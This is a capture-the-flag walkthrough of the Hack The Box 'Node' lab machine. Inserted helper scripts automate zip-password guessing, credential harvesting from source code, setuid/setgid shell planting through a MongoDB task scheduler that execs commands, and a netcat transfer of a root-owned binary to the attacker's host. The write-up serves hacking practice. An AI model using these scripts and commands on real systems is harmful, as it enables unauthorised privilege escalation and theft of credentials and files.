Downloading the file and trying to read it shows that it is base64. Decoding it out to a file with a different name shows that the decoded data is a zip archive, and trying to unzip it shows that it needs a password. These are the commands to get this done.
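The identification step above, as an added example that is not part of the original writeup: it decodes a base64 file, classifies the result from its magic bytes instead of guessing, and then tries a password list against the zip. File names and the wordlist are assumptions; the page does not give the password.

```shell
#!/bin/sh
# Added example, not from the original writeup. Identifies what a base64-wrapped
# download really is before trying to extract it. File names are assumptions.

# Decode a base64 file and print the decoded file's type from its magic bytes.
# Usage: decode_and_identify <base64-file> <output-file>
decode_and_identify() {
    base64 -d "$1" > "$2" || return 1
    magic=$(head -c 4 "$2" | od -An -tx1 | tr -d ' \n')
    case "$magic" in
        504b0304) echo zip ;;     # "PK\3\4": zip local file header
        1f8b*)    echo gzip ;;
        7f454c46) echo elf ;;
        *)        echo unknown ;;
    esac
}

# Try each candidate password from a wordlist against a zip archive.
# unzip -t only tests the archive; -P passes the password; -qq keeps it quiet.
# Prints the first password that works and returns 0, otherwise returns 1.
# Usage: try_zip_passwords <zip> <wordlist>
try_zip_passwords() {
    while IFS= read -r pw; do
        if unzip -qq -t -P "$pw" "$1" >/dev/null 2>&1; then
            echo "$pw"
            return 0
        fi
    done < "$2"
    return 1
}
```

Run it as `decode_and_identify backup.b64 backup.zip` and, if the answer is `zip`, `try_zip_passwords backup.zip rockyou.txt`. Checking the magic bytes first avoids feeding a file that is actually a second layer of encoding, or a tarball, into unzip.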
While analyzing the source code, one thing we want to find is a password. We can search for passwords by running the following commands:
kali@kali:~/HTB/node/var/www/myplace$ grep -Ri password
grep -Ri password .         // "." specifies the current directory; lists everything that matches
grep -Ri password . | less  // pipe through less to make the output easier to read
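A tighter sweep than `grep -Ri password`, added here as an example and not part of the original writeup: one function looks for assignment-style secrets while skipping `node_modules`, and the other pulls `user:password` pairs straight out of connection-string URIs (the form in which app credentials usually sit). The patterns, the helper names and the sample files used in the test are mine.

```shell
#!/bin/sh
# Added example, not from the original writeup. A tighter credential sweep than
# `grep -Ri password`: looks for assignment-style secrets and for credentials
# embedded in connection strings, and skips dependency directories.

# Usage: find_secrets <dir>
# Prints matches as file:line:text; node_modules and .git are excluded.
find_secrets() {
    grep -RniE --exclude-dir=node_modules --exclude-dir=.git \
        '(passw(or)?d|passwd|secret|api[_-]?key|token)[[:space:]]*[:=]' "$1"
}

# Usage: find_connection_creds <dir>
# Extracts "user password" pairs from scheme://user:pass@host URIs
# (mongodb://, mysql://, postgres://, ...), one unique pair per line.
find_connection_creds() {
    grep -RhoE --exclude-dir=node_modules --exclude-dir=.git \
        "[a-z]+://[^:/[:space:]\"']+:[^@[:space:]\"']+@[^[:space:]\"']+" "$1" \
        | sed -E 's#^[a-z]+://([^:]+):([^@]+)@.*#\1 \2#' \
        | sort -u
}
```

Run `find_connection_creds var/www/myplace` first: a single connection string often gives you both the username and the password, which is exactly what app.js turned out to contain here.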
After looking through the source code, not much stood out, but we did notice that it uses MongoDB.
To find where the Mongo connection is configured, we look at app.js and search for "mongo":
less app.js
/mongo
Found a username and password:
Username: mark
Password: 5AYRft73VtFpc84k
Initial Access
After obtaining the MongoDB password, we try it over SSH and it works: Mark was using the same credentials for SSH and MongoDB. Bad practice, Mark, bad practice.
Pivoting to TOM
After running LinEnum.sh, something that stood out is a running process owned by tom.
A Node scheduler running as tom. Looking at it:
Reading that file we are able to find credentials. The script takes every document in the tasks collection and passes its cmd field straight to exec, so anything we can insert into that collection runs as tom.
The first attempt did not work, but after re-running it with the right permission bits (the setuid bit, not the sticky bit) and starting the shell with -p so it keeps the effective UID, we are able to escalate to tom:
mark@node:/dev/shm$ mongo -p -u mark scheduler
MongoDB shell version: 3.2.16
Enter password:
connecting to: scheduler
> db.tasks.in
scheduler.tasks.in
> db.tasks.insert ( { "cmd" : "chmod u+s /tmp/boomer" } )
WriteResult({ "nInserted" : 1 })
> db.find()
2020-10-15T14:27:25.393+0100 E QUERY [thread1] TypeError: db.find is not a function :
@(shell):1:1
> db.tasks.find()
> ^C
bye
mark@node:/dev/shm$ ls -la /tmp/boomer
-rwsr-xr-x 1 tom tom 154072 Oct 15 14:20 /tmp/boomer
mark@node:/dev/shm$ /tmp/boomer -p
$ id
uid=1001(mark) gid=1001(mark) euid=1000(tom) groups=1001(mark)
$ whoami
tom
$
It would be ideal at this point to drop an SSH key so we can log in as tom, but unfortunately we don't have permission to do so. So we run LinEnum once more to see if there are any other findings.
PrivEsc to admin group
After running a more thorough LinEnum scan, we are able to look at the SUID binaries:
bash LinEnum.sh -t
Something that stood out:
/usr/local/bin/backup looks to be owned by root with group admin. To escalate into the admin group we will again go through MongoDB:
$ mongo -p -u mark scheduler
MongoDB shell version: 3.2.16
Enter password:
connecting to: scheduler
> db.tasks
scheduler.tasks
> db.tasks.insert( { "cmd" : "chown tom:admin /tmp/boomer; chmod 6755 /tmp/boomer;" } )
WriteResult({ "nInserted" : 1 })
> db.find()
2020-10-15T14:56:39.165+0100 E QUERY [thread1] TypeError: db.find is not a function :
@(shell):1:1
> db.tasks.find()
> ^C
bye
$ /tmp/boomer -p
$ id
uid=1001(mark) gid=1001(mark) euid=1000(tom) egid=1002(admin) groups=1002(admin),1001(mark)
$
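Both pivots above (setuid tom, then setgid admin) follow the same pattern: queue a command through scheduler.tasks, wait for the scheduler's timer to run it, then start the copied shell with -p. The script below is an added example and is not the scheduler's code or the original writeup's. It assumes what the page describes (every document in scheduler.tasks has its "cmd" run via exec as tom) and that /tmp/boomer is a copy of bash, which the page does not state but which the -p flag implies; DB_PASS must be exported before running it, and the function names are mine.

```shell
#!/bin/sh
# Added example; not the scheduler's code or the original writeup's.
# Assumes: every document in scheduler.tasks has its "cmd" run through exec()
# as tom, and /tmp/boomer is a copy of bash (assumed because of -p).
# DB_PASS must be exported; the other defaults are the values from the page.

DB_USER="${DB_USER:-mark}"
DB_NAME="${DB_NAME:-scheduler}"
SHELL_COPY="${SHELL_COPY:-/tmp/boomer}"

# Mongo shell statement that queues one command for the scheduler.
#   setuid: chmod u+s             -> euid=tom when run with -p
#   setgid: chown tom:admin, 6755 -> euid=tom and egid=admin
#           (chown clears the setuid bit, so the mode is set again afterwards)
task_insert_js() {
    case "$1" in
        setuid) printf 'db.tasks.insert({"cmd":"chmod u+s %s"})' "$SHELL_COPY" ;;
        setgid) printf 'db.tasks.insert({"cmd":"chown tom:admin %s; chmod 6755 %s"})' \
                    "$SHELL_COPY" "$SHELL_COPY" ;;
        *) return 1 ;;
    esac
}

# Succeed once the file carries the requested bit: u = setuid, g = setgid.
has_bit() {
    case "$2" in
        u) [ -u "$1" ] ;;
        g) [ -g "$1" ] ;;
        *) return 2 ;;
    esac
}

# Poll for the bit until a timeout in seconds elapses; the scheduler runs on a
# timer, so the change is not immediate.
wait_for_bit() {
    _elapsed=0
    while [ "$_elapsed" -lt "${3:-60}" ]; do
        has_bit "$1" "$2" && return 0
        sleep 1
        _elapsed=$((_elapsed + 1))
    done
    return 1
}

# Queue one stage through the database, then wait for it to take effect.
run_stage() {
    mongo -u "$DB_USER" -p "$DB_PASS" "$DB_NAME" --quiet \
        --eval "$(task_insert_js "$1")" || return 1
    wait_for_bit "$SHELL_COPY" "$2" 60
}

main() {
    [ -n "$DB_PASS" ] || { echo "export DB_PASS first" >&2; return 1; }
    cp /bin/bash "$SHELL_COPY" && chmod 755 "$SHELL_COPY"
    run_stage setuid u || return 1   # euid=tom (the page's first pivot)
    run_stage setgid g || return 1   # plus egid=admin (the second pivot)
    exec "$SHELL_COPY" -p            # -p stops bash dropping euid/egid to the real ids
}

# Run only when invoked as `sh pivot.sh run`, so the functions can also be sourced.
case "${1:-}" in run) main ;; esac
```

Polling with `[ -u ]` / `[ -g ]` replaces the repeated `ls -la /tmp/boomer` from the session above; without -p, bash notices that its effective and real IDs differ and drops back to mark before you get a prompt.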
Successful privesc into the group. Now that we are in the admin group we can access /usr/local/bin/backup. We will use netcat to transfer it, since it is a big file.
On our machine, set up a listener:
nc -lvnp 8081 > backup
On the target machine:
nc [ip] [port] < /usr/local/bin/backup   <-- this is the file we are going to transfer
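netcat gives no integrity check, and a listener that is interrupted or a sender that exits early leaves a truncated binary that will only confuse the analysis. The following is an added example, not part of the original writeup: hash the file on the target, receive it on the attacking machine, and compare before opening it in radare2. Helper names are mine; the file name `backup` comes from the page.

```shell
#!/bin/sh
# Added example, not from the original writeup: verify a netcat transfer
# by comparing SHA-256 hashes on both ends.

# Portable SHA-256: sha256sum on Linux, shasum on BSD/macOS.
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Attacker side: receive one file on a port (nc -l blocks until the sender
# closes) and print its size so a truncated transfer is obvious.
# Usage: receive_file <port> <output>
receive_file() {
    nc -lvnp "$1" > "$2"
    wc -c < "$2"
}

# Attacker side: compare the received file against the hash printed on the
# target with `file_sha256 /usr/local/bin/backup`.
# Usage: verify_transfer <local-file> <hash-from-target>
verify_transfer() {
    actual=$(file_sha256 "$1")
    if [ "$actual" = "$2" ]; then
        echo "ok: $1 $actual"
        return 0
    fi
    echo "MISMATCH: $1 got $actual expected $2" >&2
    return 1
}
```

Paste `file_sha256` into the target shell and run it against `/usr/local/bin/backup`, then `verify_transfer backup <that hash>` locally; only a matching hash means the disassembly you are about to read is of the real binary.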
Analyzing Backup Binary File
strace ./backup   // nothing interesting
kali@kali:~/HTB/node$ r2 backup
[0x08048780]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
> aaa   // analyze everything (as above)
> afl   // print the list of functions
> V     // visual mode (VV for the graph view)